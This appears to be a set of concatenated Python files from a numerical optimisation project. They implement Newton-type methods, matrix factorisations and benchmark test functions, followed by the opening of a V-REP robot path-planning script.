g[i] = 4 * X[i] + 12 * X[i+1] ** 2 - 32 * X[i+1] + (-6 * X[i] ** 2 + 20 * X[i] - 4) * (X[i-1] - X[i] ** 3 + 5 * X[i] ** 2 - 2 * X[i] -13) + \
(6 * X[i] ** 2 + 4 * X[i] - 28) * (X[i-1] + X[i] ** 3 + X[i] ** 2 - 14 * X[i] -29) - 84
# for i in range(int(self.n / 2)):
# g[2 * i] = 4 * X[2 * i] + 12 * X[2 * i + 1] ** 2 - 32 * X[2 * i + 1] - 84
# g[2 * i + 1] = (-6*X[2 * i + 1]**2 + 20*X[2 * i + 1] - 4)*(X[2 * i] - X[2 * i + 1]**3 + 5*X[2 * i + 1]**2 - 2*X[2 * i + 1] - 13) + (6*X[2 * i + 1]**2 + 4*X[2 * i + 1] - 28)*(X[2 * i] + X[2 * i + 1]**3 + X[2 * i + 1]**2 - 14*X[2 * i + 1] - 29)
return g
def hess_func(self, X):
G = np.zeros((self.n, self.n))
G[0][0] = 4
G[self.n - 1][self.n - 1] = (20 - 12*X[self.n - 1] )*(X[self.n - 2] - X[self.n - 1] **3 + 5*X[self.n - 1] **2 - 2*X[self.n - 1] - 13) + \
(12*X[self.n - 1] + 4)*(X[self.n - 2] + X[self.n - 1] **3 + X[self.n - 1] **2 - 14*X[self.n - 1] - 29) + \
(-6*X[self.n - 1] **2 + 20*X[self.n - 1] - 4)*(-3*X[self.n - 1] **2 + 10*X[self.n - 1] - 2) + (3*X[self.n - 1] **2 + 2*X[self.n - 1] - 14)*(6*X[self.n - 1] **2 + 4*X[self.n - 1] - 28)
for i in range(self.n - 1):
G[i][i + 1] = 24*X[i+1] - 32
G[i + 1][i] = G[i][i + 1]
for i in range(1, self.n - 1):
G[i][i] = (20 - 12*X[i] )*(X[i-1] - X[i] **3 + 5*X[i] **2 - 2*X[i] - 13) + (12*X[i] + 4)*(X[i-1] + X[i] **3 + X[i] **2 - 14*X[i] - 29) + \
(-6*X[i] **2 + 20*X[i] - 4)*(-3*X[i] **2 + 10*X[i] - 2) + (3*X[i] **2 + 2*X[i] - 14)*(6*X[i] **2 + 4*X[i] - 28) + 4
# for i in range(int(self.n / 2)):
# G[2 * i][2 * i] = 4
# G[2 * i][2 * i + 1] = 24*X[2*i + 1] - 32
# G[2 * i + 1][2 * i] = G[2 * i][2 * i + 1]
# G[2 * i + 1][2 * i + 1] = (20 - 12*X[2*i + 1])*(X[2*i] - X[2*i + 1]**3 + 5*X[2*i + 1]**2 - 2*X[2*i + 1] - 13) + \
# (12*X[2*i + 1] + 4)*(X[2*i] + X[2*i + 1]**3 + X[2*i + 1]**2 - 14*X[2*i + 1] - 29) + \
# (-6*X[2*i + 1]**2 + 20*X[2*i + 1] - 4)*(-3*X[2*i + 1]**2 + 10*X[2*i + 1] - 2) + \
# (3*X[2*i + 1]**2 + 2*X[2*i + 1] - 14)*(6*X[2*i + 1]**2 + 4*X[2*i + 1] - 28)
return G
class Extended_Rosenbrock:
def __init__(self, n):
assert n % 2 == 0, "n must be even"
self.n = n
self.m = n
def func(self, X):
t = np.array(range(int(self.n / 2)))
f = np.zeros(self.n)
f[2 * t] = 100 * (X[2 * t + 1] - X[2 * t] ** 2) ** 2
f[2 * t + 1] = (1 - X[2 * t]) ** 2
return np.sum(f)
def gfunc(self, X):
t = np.array(range(int(self.n / 2)))
g = np.zeros(self.n)
g[2 * t] = 400 * (X[2 * t] ** 2 - X[2 * t + 1]) * X[2 * t] + 2 * (X[2 * t] - 1)
g[2 * t + 1] = -200 * (X[2 * t] ** 2 - X[2 * t + 1])
return g
def hess_func(self, X):
G = np.zeros((self.n, self.n))
for i in range(int(self.n / 2)):
G[2 * i][2 * i] = 1200 * X[2 * i] ** 2 - 400 * X[2 * i + 1] + 2
G[2 * i + 1][2 * i + 1] = 200
G[2 * i + 1][2 * i] = -400 * X[2 * i]
G[2 * i][2 * i + 1] = G[2 * i + 1][2 * i]
return G
def diff_penalty1(n, a=1e-5):
"""[penalty1 函数的导函数]
Args:
n ([int]): X的维度
"""
symbols_X = symbols("x:{}".format(n))
sum_1 = a * sum(((x - 1) ** 2 for x in symbols_X) )
penalty_func = sum_1 + (sum((x ** 2 for x in symbols_X)) - 1 /4) ** 2
diff_list = []
for symbol in symbols_X:
diff_list.append(diff(penalty_func, symbol))
return diff_list, symbols_X
def diff_EFR(n):
"""[Extended_Freudenstein_Roth 函数的导函数]
Args:
n ([int]): X的维度
"""
symbols_X = symbols("x:{}".format(n))
f = 0
for i in range(n - 1):
f += ((symbols_X[i] + 5 * (symbols_X[i+1] ** 2) - symbols_X[i+1] ** 3 - 2 * symbols_X[i+1] - 13) ** 2 + \
(symbols_X[i] + symbols_X[i+1] ** 3 + symbols_X[i+1] ** 2 - 14 * symbols_X[i+1] - 29) ** 2)
# for i in range(int(n / 2)):
# f += ((symbols_X[2*i] + 5 * (symbols_X[2*i+1] ** 2) - symbols_X[2*i+1] ** 3 - 2 * symbols_X[2*i+1] - 13) ** 2 + \
# (symbols_X[2*i] + symbols_X[2*i+1] ** 3 + symbols_X[2*i+1] ** 2 - 14 * symbols_X[2*i+1] - 29) ** 2)
diff_list = []
for symbol in symbols_X:
diff_list.append(diff(f, symbol))
return diff_list, symbols_X
def diff_ER(n):
"""[Extended_Rosenbrock 函数的导函数]
Args:
n ([int]): X的维度
"""
symbols_X = symbols("x:{}".format(n))
f = 0
for i in range(int(n / 2)):
f += (100 * (symbols_X[2 * i + 1] - symbols_X[2 * i] ** 2) ** 2)
f += (1 - symbols_X[2 * i]) ** 2
diff_list = []
for symbol in symbols_X:
diff_list.append(diff(f, symbol))
return diff_list, symbols_X
def test():
# x0 = np.array([-3, -1, -3, -1])
# diff_wood_list, symbols_wood_list = diff_wood()
# print(g_wood(x0, diff_wood_list, symbols_wood_list))
# for m in [4, 8, 12 ,16, 20]:
# x0 = np.array([1 / m] * m)
# diff_list, symbols_list = diff_extended_powell_singular(m)
# G, symbols_list = hess_expression(m, diff_list, symbols_list)
# with open("cached_expression/g_extended_powell_singular_{m}.pkl".format(m=m), 'wb') as writer:
# pickle.dump(diff_list, writer)
# with open("cached_expression/G_extended_powell_singular_{m}.pkl".format(m=m), 'wb') as writer:
# pickle.dump(G, writer)
# with open("cached_expression/symbols_extended_powell_singular_{m}.pkl".format(m=m), 'wb') as writer:
# pickle.dump(symbols_list, writer)
# print(g_function(x0, diff_list=diff_list, symbols_list=symbols_list))
# print(g_EPS(x0))
# if np.any(G_function(x0, G_lists=G, symbols_list=symbols_list)==G_EPS(x0)):
# print("{m} Right".format(m=m))
# if np.any(g_function(x0, diff_list=diff_list, symbols_list=symbols_list)==g_EPS(x0)):
# print("{m} Right".format(m=m))
# for m in [20, 40, 60, 80 ,100]:
# x0 = np.array([1 / m] * m)
# diff_list, symbols_list = diff_trigonometric(m)
# G, symbols_list = hess_expression(m, diff_list, symbols_list)
# with open("cached_expression/g_trigonometric_{m}.pkl".format(m=m), 'wb') as writer:
# pickle.dump(diff_list, writer)
# with open("cached_expression/G_trigonometric_{m}.pkl".format(m=m), 'wb') as writer:
# pickle.dump(G, writer)
# with open("cached_expression/symbols_trigonometric_{m}.pkl".format(m=m), 'wb') as writer:
# pickle.dump(symbols_list, writer)
# print(g_function(x0, diff_list=diff_list, symbols_list=symbols_list))
# print(G_function(x0, G_lists=G, symbols_list=symbols_list))
for n in [4]:
# x0 = np.array(range(1, n+1))
x0 = np.array(range(1, n+1))
# t = np.array(range(int(n / 2)))
# x0[2 * t] = -1.2
# x0[2 * t + 1] = 1
# penalty1 = Penalty1(n)
# print(penalty1.func(x0))
# print(penalty1.gfunc(x0))
# print(penalty1.hess_func(x0))
EFR = Extended_Freudenstein_Roth(n)
# ER = Extended_Rosenbrock(n)
# print(ER.func(x0))
print(EFR.func(x0))
print(EFR.gfunc(x0))
print(EFR.hess_func(x0))
# diff_list, symbols_list = diff_EFR(n)
# G, symbols_list = hess_expression(n, diff_list, symbols_list)
# print(g_function(x0, diff_list=diff_list, symbols_list=symbols_list))
# print(G_function(x0, G_lists=G, symbols_list=symbols_list))
# for symbol, diff in zip(symbols_list, diff_list):
# print(symbol, diff)
# for i in range(n):
# for j in range(n):
# print(symbols_list[i], symbols_list[j], G[i][j])
def main():
test()
if __name__ == "__main__":
main()
--- FILE SEPARATOR ---
import functions
import Newton_Methods.fletcher_freeman as FF
import Newton_Methods.newton_method as newton_method
import utils
import numpy as np
import functools
import pickle
import argparse
from multiprocessing.pool import Pool
import os
import multiprocessing
import logging
logging.basicConfig(format='%(asctime)s,%(msecs)d %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
datefmt='%d-%m-%Y:%H:%M:%S')
logging.getLogger().setLevel(logging.DEBUG)
logger = logging.getLogger(__name__)
"""
精确线搜索超参数:
进退法:
r: 步长更新的步长
t: >1的步长放大率
0.618法:
epsilon: 终止条件阈值
非精确线搜索超参数:
rho: Armijo准则中的参数, range in (0, 1/2).
sigma: Wolfe准则中的参数, range in (rho, 1).
阻尼牛顿法超参数:
use_modified_Cholesky: 是否使用修正Cholesky分解计算下降方向
GM稳定牛顿法超参数:
zeta: 当gk的模大于zeta, 求解方程得到下降方向
修正Cholesky分解超参数:
u: 机器精度
对于任何最优化算法来说都的超参数:
search_mode: 线搜索方法,从["ELS", "ILS"]中选择
epsilon: 当函数值下降小于epsilon,迭代结束
max_epoch: 最大允许的迭代次数
"""
CRITERION = ["Armijo Goldstein", "Wolfe Powell", "Strong Wolfe Powell"]
ILS_criterion = CRITERION[0]
# logger.info("精确线搜索下的阻尼牛顿法") # 使用基本牛顿法的下降方向无法收敛,使用修正Cholesky分解的下降方向可以收敛
ELS_damp_newton_hyper_parameters = {
"ELS": {
"retreat_method": {
"a0" : 0,
"r": 1e-8,
"t": 1.5,
},
"golden_method": {
"epsilon": 1e-6,
}
},
"damp_newton": {
"use_modified_Cholesky" : False,
},
"modified_Cholesky": {
"u": 1e-20,
},
"search_mode": "ELS",
"epsilon": 1e-8,
"max_epoch": 1000,
}
# X_star, func_X_star, iter_num = newton_method.damp_newton(x0, functions.wood, g_wood_partial, G_wood_partial, hyper_parameters=ELS_damp_newton_hyper_parameters)
# logger.info("非精确线搜索下的阻尼牛顿法") # 可收敛
ILS_damp_newton_hyper_parameters = {
"ILS": {
"rho": 0.2,
"sigma": 0.5,
"t": 5,
"alpha0": 1e-8,
"criterion": ILS_criterion
},
"damp_newton": {
"use_modified_Cholesky" : False,
},
"modified_Cholesky": {
"u": 1e-20,
},
"search_mode": "ILS",
"epsilon": 1e-8,
"max_epoch": 1000,
}
# X_star, func_X_star, iter_num = newton_method.damp_newton(x0, functions.wood, g_wood_partial, G_wood_partial, hyper_parameters=ILS_damp_newton_hyper_parameters)
# logger.info("GLL线搜索下的阻尼牛顿法") # 可收敛
GLL_damp_newton_hyper_parameters = {
"GLL": {
"rho": 0.25,
"sigma": 0.5,
"M": 15,
"a": 1,
},
"damp_newton": {
"use_modified_Cholesky" : False,
},
"modified_Cholesky": {
"u": 1e-20,
},
"search_mode": "GLL",
"epsilon": 1e-8,
"max_epoch": 1000,
}
# X_star, func_X_star, iter_num = newton_method.damp_newton(x0, functions.wood, g_wood_partial, G_wood_partial, hyper_parameters=GLL_damp_newton_hyper_parameters)
# logger.info("精确线搜索下的GM稳定牛顿法") # 可收敛
ELS_GM_newton_hyper_parameters = {
"ELS": {
"retreat_method": {
"a0" : 0,
"r": 1e-10,
"t": 1.5,
},
"golden_method": {
"epsilon": 1e-7,
}
},
"GM_newton": {
"zeta": 1e-8,
},
"modified_Cholesky": {
"u": 1e-20,
},
"search_mode": "ELS",
"epsilon": 1e-8,
"max_epoch": 1000,
}
# X_star, func_X_star, iter_num = newton_method.GM_newton(x0, functions.wood, g_wood_partial, G_wood_partial, hyper_parameters=ELS_GM_newton_hyper_parameters)
# logger.info("非精确线搜索下的GM稳定牛顿法") # 可收敛
ILS_GM_newton_hyper_parameters = {
"ILS": {
"rho": 0.2,
"sigma": 0.5,
"t": 5,
"alpha0": 1e-8,
"criterion": ILS_criterion
},
"GM_newton": {
"zeta": 1e-8,
},
"modified_Cholesky": {
"u": 1e-20,
},
"search_mode": "ILS",
"epsilon": 1e-8,
"max_epoch": 1000,
}
GLL_GM_newton_hyper_parameters = {
"GLL": {
"rho": 0.25,
"sigma": 0.5,
"M": 15,
"a": 1,
},
"GM_newton": {
"zeta": 1e-8,
},
"modified_Cholesky": {
"u": 1e-20,
},
"search_mode": "GLL",
"epsilon": 1e-8,
"max_epoch": 1000,
}
ELS_FF_hyper_parameters = {
"ELS": {
"retreat_method": {
"a0" : 0,
"r": 1e-10,
"t": 1.5,
},
"golden_method": {
"epsilon": 1e-7,
}
},
"search_mode": "ELS",
"epsilon": 1e-8,
"max_epoch": 10000,
}
ILS_FF_hyper_parameters = {
"ILS": {
"rho": 0.1,
"sigma": 0.4,
"t": 5,
"alpha0": 1e-6,
"criterion": ILS_criterion
},
"search_mode": "ILS",
"epsilon": 1e-8,
"max_epoch": 1000,
}
# logger.info("GLL线搜索下的FF方法") # 可收敛
GLL_FF_hyper_parameters = {
"GLL": {
"rho": 0.25,
"sigma": 0.5,
"M": 12,
"a": 1,
},
"search_mode": "GLL",
"epsilon": 1e-8,
"max_epoch": 1000,
}
method_list = [newton_method.damp_newton, newton_method.damp_newton, newton_method.damp_newton,
newton_method.GM_newton, newton_method.GM_newton, newton_method.GM_newton,
FF.Fletcher_Freeman, FF.Fletcher_Freeman, FF.Fletcher_Freeman]
method_name_list = ["精确线搜索下的阻尼牛顿法", "非精确线搜索下的阻尼牛顿法", "GLL线搜索下的阻尼牛顿法",
"精确线搜索下的GM稳定牛顿法", "非精确线搜索下的GM稳定牛顿法", "GLL线搜索下的GM稳定牛顿法",
"精确线搜索下的FF方法", "非精确线搜索下的FF方法", "GLL线搜索下的FF方法"]
hyper_parameters_list = [ELS_damp_newton_hyper_parameters, ILS_damp_newton_hyper_parameters, GLL_damp_newton_hyper_parameters,
ELS_GM_newton_hyper_parameters, ILS_GM_newton_hyper_parameters, GLL_GM_newton_hyper_parameters,
ELS_FF_hyper_parameters, ILS_FF_hyper_parameters, GLL_FF_hyper_parameters]
parser = argparse.ArgumentParser(description='Optimization')
parser.add_argument("--m", type=int, default=20, help="测试函数的维度")
parser.add_argument("--test_fucntion", choices=["Wood", "EPS", "Trig"], type=str, default="EPS", help="测试函数的维度")
args = parser.parse_args()
m = args.m
if args.test_fucntion == "EPS":
x0 = np.array([3, -1, 0, 1] * int(m//4))
f_funciton = functions.extended_powell_singular
g_function = functions.g_EPS
G_function = functions.G_EPS
write_latex_name = "EPS_{}.txt".format(m)
elif args.test_fucntion == "Trig":
x0 = np.array([1/m] * int(m))
f_funciton = functions.trigonometric
g_function = functions.g_trigonometric
G_function = functions.G_trigonometric
write_latex_name = "Trig_{}.txt".format(m)
else:
x0 = np.array([-3, -1, -3, -1])
f_funciton = functions.wood
diff_wood_list, symbols_wood_list = functions.diff_wood_expression()
g_function = functools.partial(functions.g_wood, diff_list=diff_wood_list, symbols_list=symbols_wood_list)
hess_wood_lists, symbols_wood_list = functions.hess_wood_expression()
G_function = functools.partial(functions.G_wood, G_lists=hess_wood_lists, symbols_list=symbols_wood_list)
write_latex_name = "Wood.txt"
# results = []
# pool = multiprocessing.Pool(processes=len(hyper_parameters_list))
# for method_idx in range(len(hyper_parameters_list)):
# results.append([pool.apply_async(method_list[method_idx], (x0, f_funciton, g_function, G_function, hyper_parameters_list[method_idx], ))])
# pool.close()
# pool.join()
logger.info("== " * 20 + " {} ".format(write_latex_name) + "== " * 20)
write_latex = open(write_latex_name, 'w')
write_latex.write("\hline\n")
logger.info("精确线搜索下的阻尼牛顿法")
X_star, func_X_star, iter_num, function_num = newton_method.damp_newton(x0, f_funciton, g_function, G_function, hyper_parameters=ELS_damp_newton_hyper_parameters)
write_latex.write(" 阻尼牛顿法 & ELS & {fx} & {iter_num} & {func_k} & {is_conv} \\\\ \n".format(
fx = format(func_X_star, ".4e"),
iter_num = str(iter_num),
func_k = str(function_num),
is_conv = "是" if func_X_star < 1e-5 else "否"
))
logger.info("非精确线搜索下的阻尼牛顿法")
X_star, func_X_star, iter_num, function_num = newton_method.damp_newton(x0, f_funciton, g_function, G_function, hyper_parameters=ILS_damp_newton_hyper_parameters)
write_latex.write(" 阻尼牛顿法 & ILS & {fx} & {iter_num} & {func_k} & {is_conv} \\\\ \n".format(
fx = format(func_X_star, ".4e"),
iter_num = str(iter_num),
func_k = str(function_num),
is_conv = "是" if func_X_star < 1e-5 else "否"
))
logger.info("GLL线搜索下的阻尼牛顿法")
X_star, func_X_star, iter_num, function_num = newton_method.damp_newton(x0, f_funciton, g_function, G_function, hyper_parameters=GLL_damp_newton_hyper_parameters)
write_latex.write(" 阻尼牛顿法 & GLL & {fx} & {iter_num} & {func_k} & {is_conv} \\\\ \n".format(
fx = format(func_X_star, ".4e"),
iter_num = str(iter_num),
func_k = str(function_num),
is_conv = "是" if func_X_star < 1e-5 else "否"
))
write_latex.write("\hline\n")
logger.info("精确线搜索下的GM稳定牛顿法")
X_star, func_X_star, iter_num, function_num = newton_method.GM_newton(x0, f_funciton, g_function, G_function, hyper_parameters=ELS_GM_newton_hyper_parameters)
write_latex.write(" GM稳定牛顿法 & ELS & {fx} & {iter_num} & {func_k} & {is_conv} \\\\ \n".format(
fx = format(func_X_star, ".4e"),
iter_num = str(iter_num),
func_k = str(function_num),
is_conv = "是" if func_X_star < 1e-5 else "否"
))
logger.info("非精确线搜索下的GM稳定牛顿法")
X_star, func_X_star, iter_num, function_num = newton_method.GM_newton(x0, f_funciton, g_function, G_function, hyper_parameters=ILS_GM_newton_hyper_parameters)
write_latex.write(" GM稳定牛顿法 & ILS & {fx} & {iter_num} & {func_k} & {is_conv} \\\\ \n".format(
fx = format(func_X_star, ".4e"),
iter_num = str(iter_num),
func_k = str(function_num),
is_conv = "是" if func_X_star < 1e-5 else "否"
))
logger.info("GLL线搜索下的GM牛顿法")
X_star, func_X_star, iter_num, function_num = newton_method.GM_newton(x0, f_funciton, g_function, G_function, hyper_parameters=GLL_GM_newton_hyper_parameters)
write_latex.write(" GM稳定牛顿法 & GLL & {fx} & {iter_num} & {func_k} & {is_conv} \\\\ \n".format(
fx = format(func_X_star, ".4e"),
iter_num = str(iter_num),
func_k = str(function_num),
is_conv = "是" if func_X_star < 1e-5 else "否"
))
write_latex.write("\hline\n")
logger.info("精确线搜索下的FF方法")
X_star, func_X_star, iter_num, function_num = FF.Fletcher_Freeman(x0, f_funciton, g_function, G_function, hyper_parameters=ELS_FF_hyper_parameters)
write_latex.write(" Fletcher-Freeman 方法 & ELS & {fx} & {iter_num} & {func_k} & {is_conv} \\\\ \n".format(
fx = format(func_X_star, ".4e"),
iter_num = str(iter_num),
func_k = str(function_num),
is_conv = "是" if func_X_star < 1e-5 else "否"
))
logger.info("非精确线搜索下的FF方法")
X_star, func_X_star, iter_num, function_num = FF.Fletcher_Freeman(x0, f_funciton, g_function, G_function, hyper_parameters=ILS_FF_hyper_parameters)
write_latex.write(" Fletcher-Freeman 方法 & ILS & {fx} & {iter_num} & {func_k} & {is_conv} \\\\ \n".format(
fx = format(func_X_star, ".4e"),
iter_num = str(iter_num),
func_k = str(function_num),
is_conv = "是" if func_X_star < 1e-5 else "否"
))
logger.info("GLL线搜索下的FF方法")
X_star, func_X_star, iter_num, function_num = FF.Fletcher_Freeman(x0, f_funciton, g_function, G_function, hyper_parameters=GLL_FF_hyper_parameters)
write_latex.write(" Fletcher-Freeman 方法 & GLL & {fx} & {iter_num} & {func_k} & {is_conv} \\\\ \n".format(
fx = format(func_X_star, ".4e"),
iter_num = str(iter_num),
func_k = str(function_num),
is_conv = "是" if func_X_star < 1e-5 else "否"
))
write_latex.write("\hline\n")
write_latex.close()
--- FILE SEPARATOR ---
import math
import copy
import numpy as np
from goto import with_goto
import logging
logging.basicConfig(format='%(asctime)s,%(msecs)d %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
datefmt='%d-%m-%Y:%H:%M:%S')
logging.getLogger().setLevel(logging.DEBUG)
logger = logging.getLogger(__name__)
@with_goto
def modified_Cholesky(G, hyper_parameters=None, u=1e-20):
"""修正Cholesky分解
Args:
G ([np.array]): 用于分解的二维矩阵
hyper_parameters: (Dic): 超参数,超参数中包括:
u: 机器精度
"""
if hyper_parameters is not None:
u = hyper_parameters['u']
# 步1:初始化
G = np.array(G)
gamma = 0 # 对角元最大元素
ksai = 0 # 非对角元最大元素
n = len(G)
for i in range(n):
for j in range(n):
if i == j:
gamma = max(gamma, abs(G[i][i]))
else:
ksai = max(ksai, abs(G[i][j]))
beta_2 = max(gamma, ksai / math.sqrt(n ** 2 - 1), u)
delta = u * max(gamma + ksai, 1)
assert delta > 0 , "must have delta > 0"
L = np.eye(n, dtype=float)
D = np.zeros((n,n), dtype=float)
C = np.zeros((n,n), dtype=float)
#按列计算
j = 1 #表示当前计算的列的indx
# 步2:计算dj'
label .step2
dj_prime = max(delta, abs(G[j - 1][j - 1] - sum((C[j - 1][r - 1] ** 2 / (D[r - 1][r - 1]) for r in range(1, j))) ) )
# 步3:计算Cij
for i in range(j + 1, n + 1):
C[i - 1][j - 1] = G[i - 1][j - 1] - sum(( L[j - 1][r - 1] * C[i - 1][r - 1] for r in range(1, j)))
# 步4:计算theta_j
theta_j = 0
if j < n:
theta_j = max(( abs(C[i - 1][j - 1]) for i in range(j + 1, n + 1)))
# 步5:计算d_j
D[j - 1][j - 1] = max(dj_prime, theta_j ** 2 / beta_2)
# 步6:计算l_ij
for i in range(j + 1, n + 1):
L[i - 1][j - 1] = C[i - 1][j - 1] / D[j - 1][j - 1]
# 步7,更新j,判断是否终止
if j + 1 <= n:
j += 1
goto.step2
else:
return L, D
def get_modified_G(L, D):
LT = copy.deepcopy(L).T
C = np.dot(L, D)
return np.dot(C, LT)
@with_goto
def Bunch_Parlett(A):
"""对A进行BP分解,输出DL
Args:
A ([np.array]): 输入的矩阵
"""
# 步1:初始化
A_ = copy.deepcopy(A)
n = len(A)
D = np.zeros((n, n))
L = np.zeros((n, n))
#记录变量顺序
y = np.array(range(n))
k, m = 1, 0
# 步2:求n-m阵中对角元中的最大值
label .step2
a_tt = 0
t = -1
for i in range(m, n):
if abs(A_[i][i]) > a_tt:
a_tt = abs(A_[i][i])
t = i
# 步3:求n-m阵中非对角元的最大值
a_ls = 0
l, s = -1, -1
if m < n - 1:
for i in range(m, n):
for j in range(m, i):
if abs(A_[i][j]) > a_ls:
a_ls = abs(A_[i][j])
l = i
s = j
# 步4:根据对角元最大值和非对角元最大值比较,判断分支
if a_tt == 0 and a_ls == 0:
goto .step8
elif a_tt < 2.0 / 3 * a_ls:
goto .step6
# 步5:1*1 的块
# print("第{k}步是 1 * 1的块:".format(k=k))
# print("第{k}步最初的A:".format(k=k))
# print(A_)
# 交换行列
A_[[m, t], :] = A_[[t, m], :]
A_[:, [m, t]] = A_[:, [t, m]]
# print("交换行列后的A:".format(k=k))
# print(A_)
# y也要交换行列
y[m], y[t] = y[t], y[m]
# L也要交换行列
L[[m, t], :] = L[[t, m], :]
L[:, [m, t]] = L[:, [t, m]]
# 对D对应位置的元素赋值
D[m][m] = A_[m][m]
L[m][m] = 1
L[m + 1:, m] = A_[m + 1:, m] / A_[m][m] # 进行了操作之后就赋值了新的空间了,不用再deepcopy
# print(np.dot((L[m:, m] * D[m][m]).reshape(n-m,1) , L[m:, m].reshape(1,n-m)))
A_[m:, m:] -= np.dot((L[m:, m] * D[m][m]).reshape(n-m,1) , L[m:, m].reshape(1,n-m))
m += 1
# print("消解之后A是")
# print(A_)
# print("消解之后L是")
# print(L)
# print("消解之后D是")
# print(D)
goto .step7
# 步6:2*2 的块
label .step6
# 因为l > s,所有l行放在m+1行,l列放在m+1列,s行放在m行,s列放在m列
# 注意当m+1 == s的时候,直接用一行内写交换行列的代码可能会存在问题,所以一定要先写交换 行m和行s的代码
A_[[m, s], :] = A_[[s, m], :]
A_[[m + 1, l], :] = A_[[l, m+1], :]
A_[:, [m, s]] = A_[:, [s, m]]
A_[:, [m + 1, l]] = A_[:, [l, m + 1]]
# L也要交换行列
L[[m, s], :] = L[[s, m], :]
L[[m + 1, l], :] = L[[l, m+1], :]
L[:, [m, s]] = L[:, [s, m]]
L[:, [m + 1, l]] = L[:, [l, m + 1]]
# print("交换行列后的A:".format(k=k))
# print(A_)
y[m], y[s] = y[s], y[m]
y[m + 1], y[l] = y[l], y[m + 1],
# 对D对应位置的元素赋值
D[m: m + 2, m: m + 2] = copy.deepcopy(A_[m: m + 2, m: m + 2])
L[m: m + 2, m: m + 2] = np.eye(2) # 二阶单位阵
# print("交换行列后的A是")
# print(A_)
L[m + 2:, m: m + 2] = np.dot(A_[m + 2:, m: m + 2] , np.linalg.inv(A_[m: m + 2, m: m + 2]))
A_[m:, m:] -= np.dot( np.dot(L[m:, m: m + 2].reshape(n-m,2) , D[m: m + 2, m: m + 2]), np.mat(L[m:, m: m + 2]).T)
m += 2
# print("消解之后A是")
# print(A_)
# print("消解之后L是")
# print(L)
# print("消解之后D是")
# print(D)
# 步7:
label .step7
if m < n:
k += 1
goto .step2
# 步8
label .step8
return L, D, y
def is_pos_def(A):
"""
判断对称矩阵是否正定
"""
try:
np.linalg.cholesky(A)
return True
except np.linalg.LinAlgError:
return False
if __name__ == '__main__':
G = np.array([[1, 1, 2],
[1, 1+1e-20, 3],
[2, 3, 1]])
# print("修正Cholesky分解")
# L, D = modified_Cholesky(G)
# G_ = get_modified_G(L, D)
# print("L 是:")
# print(L)
# print("D 是:")
# print(D)
# print("修正过的G 是:")
# print(G_)
# G_1 = np.linalg.inv(G_)
# print(G_1)
# print("BP分解")
# L, D, y= Bunch_Parlett(G)
# G_ = get_modified_G(L, D)
# print("L 是:")
# print(L)
# print("D 是:")
# print(D)
# print("修正过的G 是:")
# print(G_)
# G = np.array([[11202, 1200, 0, 0],
# [1200, 220.200000000000, 0, 19.8000000000000],
# [0, 0, 10082, 1080],
# [0, 19.8000000000000, 1080, 200.200000000000]])
G = np.array(
[[1, 1, 2],
[1, 2, 3],
[2, 3, 1]],
dtype = float
)
print("BP分解")
L, D, y= Bunch_Parlett(G)
G_ = get_modified_G(L, D)
print("L 是:")
print(L)
print("D 是:")
print(D)
print("修正过的G 是:")
print(G_)
# from scipy.linalg import ldl
# lu, d, perm = ldl(np.array(G, dtype=float), lower=1)
# print("LDL 的 L是 ")
# print(lu[perm, :])
# print("LDL 的 D是")
# print(d)
# G_ = get_modified_G(lu, d)
# print("修正过的G 是:")
# print(G_)
|
[
"/Large_Scale_Methods/L_SR1.py",
"/Line_Search/GLL.py",
"/Line_Search/exact_line_search.py",
"/Line_Search/inexact_line_search.py",
"/Newton_Methods/fletcher_freeman.py",
"/Newton_Methods/inexact_newton_method.py",
"/Newton_Methods/newton_method.py",
"/Trust_Region_Methods/sorensen.py",
"/Trust_Region_Methods/trust_region_main.py",
"/Trust_Region_Methods/two_subspace_min.py",
"/functions.py",
"/newton_methods_main.py",
"/utils.py"
] |
0000duck/vrep
|
#!python3
# -*- coding:utf-8 -*-
import matplotlib.pyplot as plt
import math
import heapq
import time
try:
import vrep
except:
print ('--------------------------------------------------------------')
print ('"vrep.py" could not be imported. This means very probably that')
print ('either "vrep.py" or the remoteApi library could not be found.')
print ('Make sure both are in the same folder as this file,')
print ('or appropriately adjust the file "vrep.py"')
print ('--------------------------------------------------------------')
print ('')
class Entity:
def __init__(self, type, name, x=0.0, y=0.0, r=0, x1=0.0, x2=0.0, y1=0.0, y2=0.0):
self.type = type
self.name = name
if type == 'Point':
self.x = x
self.y = y
elif type == 'Obstacle':
self.x = x
self.y = y
self.r = r
elif type == 'Gate':
self.x1 = x1
self.y1 = y1
self.x2 = x2
self.y2 = y2
class Record:
def __init__(self, loc=-1, dis=0, gate=0, path=''):
self.loc = loc
self.dis = dis
self.gate = gate
self.path = path
self.hash = str(loc) + '$' + str(self.gate)
def __lt__(self, other):
return self.dis < other.dis
class Heap:
def __init__(self):
self.heap = []
self.hash = {}
def push(self, record):
dis = self.hash.get(record.hash, 1e+10)
if dis <= record.dis + 1e-6:
return
else:
self.hash[record.hash] = record.dis
heapq.heappush(self.heap, (record.dis, record))
def top(self):
dis, record = self.heap[0]
return record
def pop(self):
dis, record = heapq.heappop(self.heap)
return record
class Search:
def __init__(self, entities, clientID):
self.entities = entities
self.clientID = clientID
def distance_between_points(self, p1, p2):
return (p1.x - p2.x)**2 + (p1.y - p2.y)**2
def check_point_in_obstacle(self, point, obstacle):
return self.distance_between_points(point, obstacle) <= obstacle.r**2
def check_insection_with_obstacle(self, point1, point2, obstacle):
p1_to_o = math.sqrt(self.distance_between_points(point1, obstacle))
p2_to_o = math.sqrt(self.distance_between_points(point2, obstacle))
p1_to_p2 = math.sqrt(self.distance_between_points(point1, point2))
half = (p1_to_o + p2_to_o + p1_to_p2) / 2.0
s = math.sqrt(half * (half - p1_to_o) * (half - p2_to_o) * (half - p1_to_p2))
high = s * 2 / p1_to_p2
p1_b = math.sqrt(p1_to_o**2 - high**2)
p2_b = math.sqrt(p2_to_o**2 - high**2)
if abs(p1_b + p2_b - p1_to_p2) < 1e-4:
dis = high
else:
dis = min(p1_to_o, p2_to_o)
return dis < obstacle.r
def draw(self, type='A'):
if type == 'A':
for entity in self.entities:
if entity.type == 'Point':
if entity.name == 'Target0':
plt.scatter(entity.x, entity.y, c='r')
elif entity.name == 'Target1':
plt.scatter(entity.x, entity.y, c='g')
elif entity.name == 'Target2':
plt.scatter(entity.x, entity.y, c='b')
else:
print (entity.name)
elif entity.type == 'Obstacle':
xs = [entity.x + entity.r * math.cos(math.pi * 2.0 * i / 1000) for i in range(0, 1000)]
